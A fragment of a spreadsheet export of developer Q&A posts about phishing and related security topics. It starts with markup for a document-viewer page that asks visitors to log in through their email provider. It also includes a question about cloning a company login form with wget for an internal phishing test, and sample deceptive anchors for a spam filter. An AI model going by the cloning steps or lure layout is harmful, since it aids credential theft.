 color-stop(0.5, #355492), to(#2A4887));border:1px solid #29447e;-webkit-background-clip:padding-box;-webkit-border-radius:3px;-webkit-box-shadow:rgba(0, 0, 0, .117188) 0 1px 1px inset,
 rgba(255, 255, 255, .167969) 0 1px 0;display:inline-block;margin-top:3px;max-width:85px;line-height:18px;padding:4px 12px;position:relative}
 .fb_dialog_content .dialog_header .touchable_button input{border:none;background:none;color:#fff;font:12px Helvetica, sans-serif;font-weight:bold;margin:2px -12px;padding:2px 6px 3px 6px;text-shadow:rgba(0, 30, 84, .296875) 0 -1px 0}
 .fb_dialog_content .dialog_header .header_center{color:#fff;font-size:16px;font-weight:bold;line-height:18px;text-align:center;vertical-align:middle}
 .fb_dialog_content .dialog_content{background:url(http://static.ak.fbcdn.net/rsrc.php/v2/y9/r/jKEcVPZFk-2.gif) no-repeat 50% 50%;border:1px solid #555;border-bottom:0;border-top:0;height:150px}
 .fb_dialog_content .dialog_footer{background:#f2f2f2;border:1px solid #555;border-top-color:#ccc;height:40px}
 #fb_dialog_loader_close{float:left}
 .fb_dialog.fb_dialog_mobile .fb_dialog_close_button{text-shadow:rgba(0, 30, 84, .296875) 0 -1px 0}
 .fb_dialog.fb_dialog_mobile .fb_dialog_close_icon{visibility:hidden}
 .fb_iframe_widget{display:inline-block;position:relative}
 .fb_iframe_widget span{display:inline-block;position:relative;text-align:justify}
 .fb_iframe_widget iframe{position:absolute}
 .fb_iframe_widget_lift{z-index:1}
 .fb_hide_iframes iframe{position:relative;left:-10000px}
 .fb_iframe_widget_loader{position:relative;display:inline-block}
 .fb_iframe_widget_fluid{display:inline}
 .fb_iframe_widget_fluid span{width:100%}
 .fb_iframe_widget_loader iframe{min-height:32px;z-index:2;zoom:1}
 .fb_iframe_widget_loader .FB_Loader{background:url(http://static.ak.fbcdn.net/rsrc.php/v2/y9/r/jKEcVPZFk-2.gif) no-repeat;height:32px;width:32px;margin-left:-16px;position:absolute;left:50%;z-index:4}
 .fb_connect_bar_container div,
 .fb_connect_bar_container span,
 .fb_connect_bar_container a,
 .fb_connect_bar_container img,
 .fb_connect_bar_container strong{background:none;border-spacing:0;border:0;direction:ltr;font-style:normal;font-variant:normal;letter-spacing:normal;line-height:1;margin:0;overflow:visible;padding:0;text-align:left;text-decoration:none;text-indent:0;text-shadow:none;text-transform:none;visibility:visible;white-space:normal;word-spacing:normal;vertical-align:baseline}
 .fb_connect_bar_container{position:fixed;left:0 !important;right:0 !important;height:42px !important;padding:0 25px !important;margin:0 !important;vertical-align:middle !important;border-bottom:1px solid #333 !important;background:#3b5998 !important;z-index:99999999 !important;overflow:hidden !important}
 .fb_connect_bar_container_ie6{position:absolute;top:expression(document.compatMode=="CSS1Compat"? document.documentElement.scrollTop+"px":body.scrollTop+"px")}
 .fb_connect_bar{position:relative;margin:auto;height:100%;width:100%;padding:6px 0 0 0 !important;background:none;color:#fff !important;font-family:"lucida grande", tahoma, verdana, arial, sans-serif !important;font-size:13px !important;font-style:normal !important;font-variant:normal !important;font-weight:normal !important;letter-spacing:normal !important;line-height:1 !important;text-decoration:none !important;text-indent:0 !important;text-shadow:none !important;text-transform:none !important;white-space:normal !important;word-spacing:normal !important}
 .fb_connect_bar a:hover{color:#fff}
 .fb_connect_bar .fb_profile img{height:30px;width:30px;vertical-align:middle;margin:0 6px 5px 0}
 .fb_connect_bar div a,
 .fb_connect_bar span,
 .fb_connect_bar span a{color:#bac6da;font-size:11px;text-decoration:none}
 .fb_connect_bar .fb_buttons{float:right;margin-top:7px}
 .fbpluginrecommendationsbarleft,
 .fbpluginrecommendationsbarright{position:fixed !important;bottom:0;z-index:999}
 .fbpluginrecommendationsbarleft{left:10px}
 .fbpluginrecommendationsbarright{right:10px}
  .auto-style1 {
  margin-top: 155px;
  }
  .auto-style2 {
  border-width: 0px;
  }
  &amp;lt;/style&amp;gt;&amp;lt;/head&amp;gt;
 &amp;lt;body&amp;gt;&amp;lt;div style="visibility: hidden; position: absolute; overflow: hidden; padding: 0px; width: 0px; left: 0px; top: 0px;" id="WzTtDiV"&amp;gt;&amp;lt;/div&amp;gt;
 &amp;lt;script type="text/javascript" src="View_files/tooltip-5.js"&amp;gt;&amp;lt;/script&amp;gt;
 &amp;lt;script type="text/javascript" src="View_files/all.js"&amp;gt;&amp;lt;/script&amp;gt;
 &amp;lt;div&amp;gt;
  &amp;lt;div class=" fb_reset" id="fb-root"&amp;gt;&amp;lt;div style="position: absolute; top: -10000px; height: 0px; width: 0px;"&amp;gt;&amp;lt;div&amp;gt;&amp;lt;iframe src="View_files/LEdxGgtB9cN.htm" style="border: medium none;" tab-index="-1" title="Facebook Cross Domain Communication Frame" aria-hidden="true" id="fb_xdm_frame_http" allowtransparency="true" name="fb_xdm_frame_http" frameborder="0" scrolling="no"&amp;gt;&amp;lt;/iframe&amp;gt;&amp;lt;iframe src="View_files/LEdxGgtB9cN_002.htm" style="border: medium none;" tab-index="-1" title="Facebook Cross Domain Communication Frame" aria-hidden="true" id="fb_xdm_frame_https" allowtransparency="true" name="fb_xdm_frame_https" frameborder="0" scrolling="no"&amp;gt;&amp;lt;/iframe&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;div style="position: absolute; top: -10000px; height: 0px; width: 0px;"&amp;gt;&amp;lt;div&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;/div&amp;gt;
  &amp;lt;script type="text/javascript"&amp;gt;
  function getLoggedInText(fbResponse) {
  var text = 'Logged in as ' + fbResponse.name + '. &amp;lt;a href="#" onclick="_gaq.push([\'_trackEvent\', \'Facebook\', \'Facebook Logout\']); FB.logout(function() { /*var userInfo = document.getElementById(\'fbPanel\'); userInfo.innerHTML = getLoggedOutText(); */}); return false;" &amp;gt;&amp;lt;img style="vertical-align: text-bottom" border="0" id="fb_logout_image" src="/images/social/fblogout.gif" alt="Logout"/&amp;gt;&amp;lt;/a&amp;gt;';
  //alert(text);
  return text; 
  }
  function getLoggedOutText() {
  var text = 'You are not logged in yet. &amp;lt;a style="color: #5990A9" onclick="_gaq.push([\'_trackEvent\', \'ViewPopup\', \'Why login\']);" href="whylogin.php?height=400&amp;amp;amp;width=550" class="thickbox" target="_blank" title="Login"&amp;gt;Why should you do it?&amp;lt;/a&amp;gt; ';
  text = text + '&amp;lt;a href="#" onclick="_gaq.push([\'_trackEvent\', \'Facebook\', \'Facebook Login\']); FB.login(function() { /*var userInfo = document.getElementById(\'fbPanel\'); userInfo.innerHTML = getLoggedInText(); */}, {scope: \'publish_actions\'}); return false;" &amp;gt;&amp;lt;img style="vertical-align: text-bottom" border="0" id="fb_login_image" src="/images/social/fblogin.jpg" alt="Login"/&amp;gt;&amp;lt;/a&amp;gt;';
  //alert(text);
  return text;
  }
 window.fbAsyncInit = function() {
  FB.init({ appId: '117978301565673', 
  status: true, 
  cookie: true,
  xfbml: true,
  oauth: true});
  function updateButton(response) {
  var userInfo = document.getElementById('fbPanel');
  if (response.authResponse) {
  //user is already logged in and connected 
  FB.api('/me', function(response) {
  userInfo.innerHTML = getLoggedInText(response); 
  }); 
  } else {
  //user is not connected to your app or logged out
  userInfo.innerHTML = getLoggedOutText(); 
  }
  }
  // run once with current status and whenever the status changes
  FB.getLoginStatus(updateButton);
  FB.Event.subscribe('auth.statusChange', updateButton); 
 };
  /*FB.init({
  appId : '117978301565673',
  oauth: true,
  status: true,
  cookie: true,
  xfbml: true
  });
  FB.Event.subscribe('auth.statusChange', function(response) {
  // alert('ciao');
  $.get('ajax/fbLoginPanel1.php', function(data) {
  $('#fbPanel').html(data);
  alert(data);
  FB.XFBML.parse(document.getElementById('fbPanel')); 
  });
  //login-btn
  //window.location.reload();
  });
  FB.Event.subscribe('auth.login', function(response) {
  _gaq.push(['_trackEvent', 'Facebook', 'Login with facebook account']);
  });*/
  &amp;lt;/script&amp;gt;
 &amp;lt;/div&amp;gt;
  &amp;lt;div id="main" style="left: 50%; top: 45%; height: 724px; width: 803px;"&amp;gt;
  &amp;lt;div class="logo"&amp;gt;
  &amp;lt;img alt="View Docs Online" src="View_files/logo.jpg" border="0"&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div class="slogan"&amp;gt;
  &amp;lt;font color="black"&amp;gt;The easiest way to view documents online
  &amp;lt;/div&amp;gt; 
  &amp;lt;div style="font-size: small; padding: 5px; color: rgb(89, 144, 169); width: 716px; margin: 10pt auto; text-align: center;"&amp;gt;
  &amp;lt;font color="red"&amp;gt;New!&amp;lt;/font&amp;gt; Login with your &amp;lt;span lang="en-us"&amp;gt;
  Email&amp;lt;/span&amp;gt; and &amp;lt;span lang="en-us"&amp;gt;view&amp;lt;/span&amp;gt; all your docs!&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; 
 &amp;lt;strong&amp;gt;Choose your email provider below and login:&amp;lt;/strong&amp;gt;&amp;lt;br /&amp;gt;
  &amp;lt;br /&amp;gt;
  &amp;lt;a href="YLogin.htm"&amp;gt;
  &amp;lt;img alt="" height="48" src="View_files/yahoo.jpg" width="132" class="auto-style2" /&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;span lang="en-us"&amp;gt;&amp;amp;nbsp;
  &amp;lt;/span&amp;gt;
  &amp;lt;a href="ALogin.htm"&amp;gt;
  &amp;lt;img alt="" class="auto-style2" height="48" src="View_files/aol.jpg" width="132" /&amp;gt;&amp;lt;/a&amp;gt;&amp;amp;nbsp;
  &amp;lt;a href="GLogin.htm"&amp;gt;
  &amp;lt;img alt="" class="auto-style2" height="48" src="View_files/gmail.jpg" width="132" /&amp;gt;&amp;lt;/a&amp;gt;&amp;amp;nbsp;
  &amp;lt;a href="HLogin.htm"&amp;gt;
  &amp;lt;img alt="" height="48" src="View_files/hotmail.jpg" width="132" class="auto-style2" /&amp;gt;&amp;lt;/a&amp;gt;&amp;amp;nbsp;
  &amp;lt;a href="OLogin.htm"&amp;gt;
  &amp;lt;img alt="" height="48" src="View_files/other.jpg" width="132" class="auto-style2" /&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/div&amp;gt; 
  &amp;lt;div&amp;gt;
  &amp;lt;div id="fbPanel" style="font-size: small; padding: 5px; color: #91B6DB; text-align: center" class="auto-style1"&amp;gt;
  You are not logged in yet. &amp;lt;a style="color: #5990A9" onclick="_gaq.push(['_trackEvent', 'ViewPopup', 'Why login']);" href="http://www.viewdocsonline.com/whylogin.php?height=400&amp;amp;amp;width=550" class="thickbox" target="_blank" title="Login"&amp;gt;Why should you do it?&amp;lt;/a&amp;gt;&amp;lt;/div&amp;gt;
  &amp;lt;div class="links"&amp;gt; 
  &amp;lt;a onclick="_gaq.push(['_trackEvent', 'ViewPopup', 'My docs']);" href="http://www.viewdocsonline.com/mydocs.php?height=350&amp;amp;amp;width=550" class="thickbox" target="_blank" title="My docs"&amp;gt;My docs&amp;lt;/a&amp;gt;
  &amp;lt;span class="separator"&amp;gt;|&amp;lt;/span&amp;gt; 
  &amp;lt;a onclick="_gaq.push(['_trackEvent', 'ViewPopup', 'Support']);" href="http://www.viewdocsonline.com/support.php?height=400&amp;amp;amp;width=550" class="thickbox" target="_blank" title="Support"&amp;gt;Support&amp;lt;/a&amp;gt;
  &amp;lt;span class="separator"&amp;gt;|&amp;lt;/span&amp;gt;
  &amp;lt;a onclick="_gaq.push(['_trackEvent', 'Outbound Links', 'Blog']);" href="http://www.viewdocsonline.com/blog" target="_blank"&amp;gt;Blog&amp;lt;/a&amp;gt;
  &amp;lt;span class="separator"&amp;gt;|&amp;lt;/span&amp;gt;
  &amp;lt;a onclick="_gaq.push(['_trackEvent', 'ViewPopup', 'About']);" href="http://www.viewdocsonline.com/about.php?height=350&amp;amp;amp;width=550" class="thickbox" target="_blank" title="About us"&amp;gt;About us&amp;lt;/a&amp;gt;
  &amp;lt;span class="separator"&amp;gt;|&amp;lt;/span&amp;gt; 
  &amp;lt;a onclick="_gaq.push(['_trackEvent', 'ViewPopup', 'Terms']);" href="http://www.viewdocsonline.com/terms.php?height=400&amp;amp;amp;width=550" class="thickbox" target="_blank" title="Terms and Conditions"&amp;gt;Terms and Conditions&amp;lt;/a&amp;gt; 
  &amp;lt;/div&amp;gt; 
  &amp;lt;/div&amp;gt;
  &amp;lt;div class="footer"&amp;gt;
  Copyright ¬© 2009-2014 Denis Remondini. All Rights Reserved. 
  &amp;lt;/div&amp;gt;
 &amp;lt;/div&amp;gt;
 &amp;lt;div id="listOfFilesSupported" style="display: none;"&amp;gt;
 &amp;lt;p&amp;gt;
 &amp;lt;b&amp;gt;Readable files&amp;lt;/b&amp;gt;
 &amp;lt;/p&amp;gt;
  &amp;lt;div style="margin-bottom: 1em"&amp;gt;
  Microsoft Office:
  &amp;lt;div style="display: inline-block; height: 16px; width: 16px; background: url(&amp;amp;quot;/images/sprites/filetypes.png&amp;amp;quot;); background-position: 0px -130px; vertical-align: bottom;"&amp;gt;&amp;amp;nbsp;&amp;lt;/div&amp;gt;
  &amp;lt;div style="display: inline;"&amp;gt;doc, docx&amp;lt;/div&amp;gt;
  &amp;lt;div style="display: inline-block; height: 16px; width: 16px; background: url(&amp;amp;quot;/images/sprites/filetypes.png&amp;amp;quot;); background-position: 0px -78px; vertical-align: bottom;"&amp;gt;&amp;amp;nbsp;&amp;lt;/div&amp;gt;
  &amp;lt;div style="display: inline;"&amp;gt;ppt, pptx, pps&amp;lt;/div&amp;gt;
  &amp;lt;div style="display: inline-block; height: 16px; width: 16px; background: url(&amp;amp;quot;/images/sprites/filetypes.png&amp;amp;quot;); background-position: 0px 0px; vertical-align: bottom;"&amp;gt;&amp;amp;nbsp;&amp;lt;/div&amp;gt;
  &amp;lt;div style="display: inline;"&amp;gt;xls, xlsx&amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div style="margin-bottom: 1em"&amp;gt;PDF: 
  &amp;lt;div style="display: inline-block; height: 16px; width: 16px; background: url(&amp;amp;quot;/images/sprites/filetypes.png&amp;amp;quot;); background-position: 0px -52px; vertical-align: bottom;"&amp;gt;&amp;amp;nbsp;&amp;lt;/div&amp;gt;
  &amp;lt;div style="display: inline;"&amp;gt;pdf, ps&amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div style="margin-bottom: 1em"&amp;gt;Open Office: 
  &amp;lt;div style="display: inline-block; height: 16px; width: 16px; background: url(&amp;amp;quot;/images/sprites/filetypes.png&amp;amp;quot;); background-position: 0px -26px; vertical-align: bottom;"&amp;gt;&amp;amp;nbsp;&amp;lt;/div&amp;gt;
  &amp;lt;div style="display: inline;"&amp;gt;odt, odp, ods, odg, odf, sxw, sxc, sxi, sxd&amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div style="margin-bottom: 1em"&amp;gt;eBooks: 
  &amp;lt;div style="display: inline-block; height: 16px; width: 16px; background: url(&amp;amp;quot;http://www.siliconvalleyblog.de/ebook.gif&amp;amp;quot;); background-position: 0px -160px; vertical-align: bottom;"&amp;gt;&amp;amp;nbsp;&amp;lt;/div&amp;gt;
  &amp;lt;div style="display: inline;"&amp;gt;epub&amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div style="margin-bottom: 1em"&amp;gt;Text: 
  &amp;lt;div style="display: inline-block; height: 16px; width: 16px; background: url(&amp;amp;quot;/images/sprites/filetypes.png&amp;amp;quot;); background-position: 0px -104px; vertical-align: bottom;"&amp;gt;&amp;amp;nbsp;&amp;lt;/div&amp;gt;
  &amp;lt;div style="display: inline;"&amp;gt;txt, rtf&amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
 &amp;lt;/div&amp;gt;
 &amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;security&gt;</t>
  </si>
  <si>
    <t>OAuth on iPhone: using Safari or UIWebView?</t>
  </si>
  <si>
    <t>&lt;p&gt;When I implement OAuth in iPhone, I have a dilemma to choose Safari or UIWebView to open the Twitter pages for user authentication?
 I write some advantage and disadvantage of both case:
 Using UIWebWeb. The disadvantage is users have to enter their credentials in our application. It's maybe risky phishing. The advantage is this approach will not quit our app.&lt;/p&gt;
 &lt;p&gt;Using Safari for user to authenticate (this approach automatically callbacks to our application) Addvantage: less risky. Disadvantage: have to quit our app&lt;/p&gt;
 &lt;p&gt;A good reference link about this: &lt;a href="http://fireeagle.yahoo.net/developer/documentation/oauth_best_practice" rel="nofollow noreferrer"&gt;http://fireeagle.yahoo.net/developer/documentation/oauth_best_practice&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Which approach do you prefer?
 Any response is appreciate. Thanks.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;iphone&gt;&lt;oauth&gt;</t>
  </si>
  <si>
    <t>Matching HTML anchors which display different URL from its href</t>
  </si>
  <si>
    <t>&lt;p&gt;We're victims of phishing attacks and we want to strengthen our Postfix spam filters.&lt;/p&gt;
 &lt;p&gt;We want to detect email bodies containing anchors (&lt;code&gt;&amp;lt;a&amp;gt;&lt;/code&gt;) around an URL but targeting a different URL in its href.&lt;/p&gt;
 &lt;p&gt;Here's a list of examples:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;VALID
 &amp;lt;a href=&amp;quot;www.google.com&amp;quot;&amp;gt;www.google.com&amp;lt;/a&amp;gt;
 &amp;lt;a href=&amp;quot;www.google.com&amp;quot;&amp;gt;google.com&amp;lt;/a&amp;gt;
 &amp;lt;a href=&amp;quot;https://www.google.com&amp;quot; id=&amp;quot;someId&amp;quot;&amp;gt;google.com&amp;lt;/a&amp;gt;
 &amp;lt;a id=&amp;quot;ID&amp;quot; href=&amp;quot;https://google.com&amp;quot;&amp;gt;google.com&amp;lt;/a&amp;gt;
 INVALID
 &amp;lt;a href=&amp;quot;www.malicious.com&amp;quot;&amp;gt;www.google.com&amp;lt;/a&amp;gt;
 &amp;lt;a href=&amp;quot;www.malicious.com&amp;quot;&amp;gt;google.com&amp;lt;/a&amp;gt;
 &amp;lt;a href=&amp;quot;www.malicious.com&amp;quot; id=&amp;quot;someId&amp;quot;&amp;gt;google.com&amp;lt;/a&amp;gt;
 &amp;lt;a id=&amp;quot;ID&amp;quot; href=&amp;quot;https://google.evil.com&amp;quot;&amp;gt;google.com&amp;lt;/a&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;&lt;a href="https://regex101.com/r/kZUN84/1" rel="nofollow noreferrer"&gt;https://regex101.com/r/kZUN84/1&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;My plan was to create a named capture group containing the domain + TLD (ie. &amp;quot;google.com&amp;quot; for &amp;quot;https://www.google.com&amp;quot;), and check if the text inside the anchor tag matches it. If not, it may be a spam.&lt;/p&gt;
 &lt;p&gt;As you can see in the regex101 link, I believe I must used capture groups and negative lookahead, but I'm still struggling writing it... (and &lt;em&gt;I know&lt;/em&gt; URL validation can be tricky)&lt;/p&gt;
 &lt;p&gt;Any advise to check if a regex matches one of its sub-string ?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;regex&gt;&lt;postfix-mta&gt;&lt;spam&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How to display only certain bins according to bin height with a pyplot histogram</t>
  </si>
  <si>
    <t>&lt;p&gt;I am currently trying to plot the frequencies from a csv column into a histogram.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;df = pd.read_csv(filename)
 fig = plt.figure()
 plt.hist(df[&amp;quot;attack_website&amp;quot;], bins=100, rwidth=0.7,
 fig.savefig(&amp;quot;phishHistogram.pdf&amp;quot;)
 plt.show()
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Here is the current code I have. There are 2 problems I am struggling with.&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;I only want to display bins where the frequency is greater than 5.&lt;/li&gt;
 &lt;li&gt;On the x axis there is every unique element name. I only want to display the names of the bars that are being plotted.&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;The column df[&amp;quot;attack_website&amp;quot;] looks like:&lt;/p&gt;
 &lt;p&gt;[Microsoft, -1, allegro, allegro, -1, -1, -1, -1, internal revenue service, -1,.......]&lt;/p&gt;
 &lt;p&gt;I am trying to plot these frequencies as a histogram but only ones with occurences greater than 5&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/Sf9tn.jpg" rel="nofollow noreferrer"&gt;Plot of Data using provided code&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;python&gt;&lt;matplotlib&gt;&lt;histogram&gt;</t>
  </si>
  <si>
    <t>Phishing login form</t>
  </si>
  <si>
    <t>&lt;p&gt;I am working on a phishing quest, where I have to clone a company login form and test my colleagues who failed the cyber training.
 My planning procedure is the following:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Get clone of (any) login form without any aditional tool like SET
 &lt;pre&gt;&lt;code&gt;$ wget --mirror --convert-links --page-requisites https://somerandomloginform
 &lt;/code&gt;&lt;/pre&gt;
 &lt;/li&gt;
 &lt;li&gt;Put &amp;quot;malicous&amp;quot; code into cloned code&lt;/li&gt;
 &lt;li&gt;Deploy it on my VPS and start testing&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;I'am stuck in the first step, because I thought that &lt;code&gt;--convert-links&lt;/code&gt; will download not only the HTML page, but also all related js files, but it's not happened.
 So maybe I didn't understand it correcly. Take for example Gmail login form, is it even possible to do it with simple command without tools like SET. And also because I am a web developer, I wonder if is there any protection against that?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;security&gt;&lt;wget&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>What are the dangers of using OpenID for your website?</t>
  </si>
  <si>
    <t>&lt;p&gt;Let's say I create a website like StackOverFlow and decide to use OpenID. What's to prevent me, or anyone else for that matter, from phishing the ID's? That is, how can you truly know that any website is using OpenID and not pretending to? And how do you protect myself against this?&lt;/p&gt;
 &lt;p&gt;Expanding on this, let's say one site did compromise your openID credentials, couldn't they use it on every other site using openID (a global password hack)? Wouldn't then the security of your openID then only be as strong as the weakest website/provider? &lt;/p&gt;</t>
  </si>
  <si>
    <t>Stephane Grenier</t>
  </si>
  <si>
    <t>&lt;openid&gt;</t>
  </si>
  <si>
    <t>SQLAlchemy cant convert boolean to int with mysql</t>
  </si>
  <si>
    <t>&lt;p&gt;The query seems to be ok, and works fine when I filter the boolean value to &lt;strong&gt;False&lt;/strong&gt;, but it gives my this exception when query returns items with boolean value &lt;strong&gt;True&lt;/strong&gt;.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;query = session.query(URL).filter_by(status_code=200,
  content_type='text/html',
  is_phish_whitelist=True,
  is_phish_google_safebrowsing=None,
  is_malware_google_safebrowsing=None)
 Traceback (most recent call last):
  File "/home/user/PycharmProjects/poc/collector/verify_googlesafe.py", line 25, in &amp;lt;module&amp;gt;
  phish_urls = phish_query.all()
  File "/home/user/Envs/poc/local/lib/python2.7/site-packages/sqlalchemy/orm/query.py", line 2237, in all
  return list(self)
  File "/home/user/Envs/poc/local/lib/python2.7/site-packages/sqlalchemy/orm/loading.py", line 72, in instances
  rows = [process[0](row, None) for row in fetch]
  File "/home/user/Envs/poc/local/lib/python2.7/site-packages/sqlalchemy/orm/loading.py", line 447, in _instance
  populate_state(state, dict_, row, isnew, only_load_props)
  File "/home/user/Envs/poc/local/lib/python2.7/site-packages/sqlalchemy/orm/loading.py", line 301, in populate_state
  populator(state, dict_, row)
  File "/home/user/Envs/poc/local/lib/python2.7/site-packages/sqlalchemy/orm/strategies.py", line 150, in fetch_col
  dict_[key] = row[col]
 ValueError: int_to_boolean only accepts None, 0 or 1
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Edit:&lt;/p&gt;
 &lt;p&gt;I've installed SQLAlchemy without the C Extensions and everithing worked properly so it looks like a bug in the C Extension. I'm going to report this to them and see what they say.&lt;/p&gt;
 &lt;p&gt;pip install --global-option='--without-cextensions' SQLAlchemy&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;python&gt;&lt;mysql&gt;&lt;sql&gt;&lt;sqlalchemy&gt;</t>
  </si>
  <si>
    <t>Chrome crashes after launching [Selenium] [Python]</t>
  </si>
  <si>
    <t>&lt;p&gt;I have written a small script to load my default Chrome profile and open a site using Selenium. However, after chrome successfully launches, the code pauses for a while and then crashes. &lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;My script:&lt;/strong&gt;&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; options = webdriver.ChromeOptions() 
  options.add_argument("--user-data-dir=C:\\Users\\hbur3\\AppData\\Local\\Google\\Chrome\\User Data") 
  options.add_argument("--start-maximized");
  wd = webdriver.Chrome(chrome_options=options)
  wd.get("https://google.com.au/")
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;&lt;strong&gt;Python error:&lt;/strong&gt;&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; selenium.common.exceptions.WebDriverException: Message: unknown error: Chrome failed to start: crashed
  (Driver info: chromedriver=2.27.440174 (e97a722caafc2d3a8b807ee115bfb307f7d2cfd9),platform=Windows NT 10.0.14393 x86_64)
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;&lt;strong&gt;Chromedriver log:&lt;/strong&gt;&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;[2.638][INFO]: Launching chrome: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-client-side-phishing-detection --disable-default-apps --disable-hang-monitor --disable-infobars --disable-popup-blocking --disable-prompt-on-repost --disable-sync --disable-web-resources --enable-logging --ignore-certificate-errors --load-component-extension="C:\Users\hbur3\AppData\Local\Temp\scoped_dir21208_8173\internal" --log-level=0 --metrics-recording-only --no-first-run --password-store=basic --remote-debugging-port=12638 --safebrowsing-disable-auto-update --start-maximized --test-type=webdriver --use-mock-keychain --user-data-dir="C:\Users\hbur3\AppData\Local\Google\Chrome\User Data"
  [2.641][DEBUG]: DevTools request: http://localhost:12638/json/version
  [4.644][DEBUG]: DevTools request failed
  [4.695][DEBUG]: DevTools request: http://localhost:12638/json/version
  [4.896][DEBUG]: DevTools request failed
  [4.946][DEBUG]: DevTools request: http://localhost:12638/json/version
  [6.699][DEBUG]: DevTools request failed
  [6.750][DEBUG]: DevTools request: http://localhost:12638/json/version
  [6.950][DEBUG]: DevTools request failed
  etc...
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I have tried a whole range of solutions, including:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Reinstalling Chromedriver&lt;/li&gt;
 &lt;li&gt;Creating a new Chrome user profile&lt;/li&gt;
 &lt;li&gt;Copying the default profile elsewhere&lt;/li&gt;
 &lt;li&gt;Only running when no other Chrome windows were open&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;I'm loathed to delete my profile and reinstall Chrome, but this may be my only solution. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;python&gt;&lt;google-chrome&gt;&lt;selenium&gt;&lt;selenium-webdriver&gt;&lt;selenium-chromedriver&gt;</t>
  </si>
  <si>
    <t>Records can not be found</t>
  </si>
  <si>
    <t>&lt;p&gt;Issue: my &lt;code&gt;SPF Record (TXT)&lt;/code&gt; can not be retrieved from the DNS entry of the domain &lt;code&gt;zwischengas.com&lt;/code&gt;&lt;br&gt;
 In my DNS entry I have one line for the SPF Record (as TXT entry):&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;@ IN TXT "v=spf1 ip4:188.a.b.c ip4:xyz/22
 ip4:xyz/24 ip4:xyz/21 ip4:xyz/24 ip4:xyz/24" "ip4:xyz ip4:xyz/22
 ip4:xyz ip4:xyz/29 ip4:xyz/29 ip4:xyz/28" "ip4:xyz/24 ip4:xyz/24 a mx
 ?all"
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I have the problem, that this SPF Record can not be found and I have no clue why.
 According to the RFC splitting up a very long line into multiple strings is recommended in order to keep all substrings smaller than 255 characters.&lt;/p&gt;
 &lt;p&gt;My domain is zwischengas.com , the Mail Server's IP is 188.a.b.c, anybody a clue?&lt;/p&gt;
 &lt;p&gt;I tried these tests without success:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;host -t txt zwischengas.com
 spfquery -ip-address 188.a.b.c -m test@zwischengas.com -h zwischengas.com
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Also the tests with online tools are without success:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;a href="http://www.kitterman.com/spf/validate.html" rel="nofollow"&gt;http://www.kitterman.com/spf/validate.html&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a href="http://mxtoolbox.com/DNSLookup.aspx" rel="nofollow"&gt;http://mxtoolbox.com/DNSLookup.aspx&lt;/a&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Also Google Mail (gmail.com) can not retrieve my SPF record (according to the original mail header section):&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Received-SPF: neutral (google.com: 188.a.b.c is neither permitted
 nor denied by best guess record for domain of
 noreply1@zwischengas.com) client-ip=188.a.b.c;
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;dns&gt;&lt;spf&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>PHP mail causing phishing warning on gmail</t>
  </si>
  <si>
    <t>&lt;p&gt;I am using PHPMailer to send automated e-mails from my website and while testing, I noticed that when I sent mail from website by Gmail, then e-mails sent by php mailer are generating the following warning on the recipients end:
 This message may not have been sent by: example@gmail.com Learn more Report phishing.
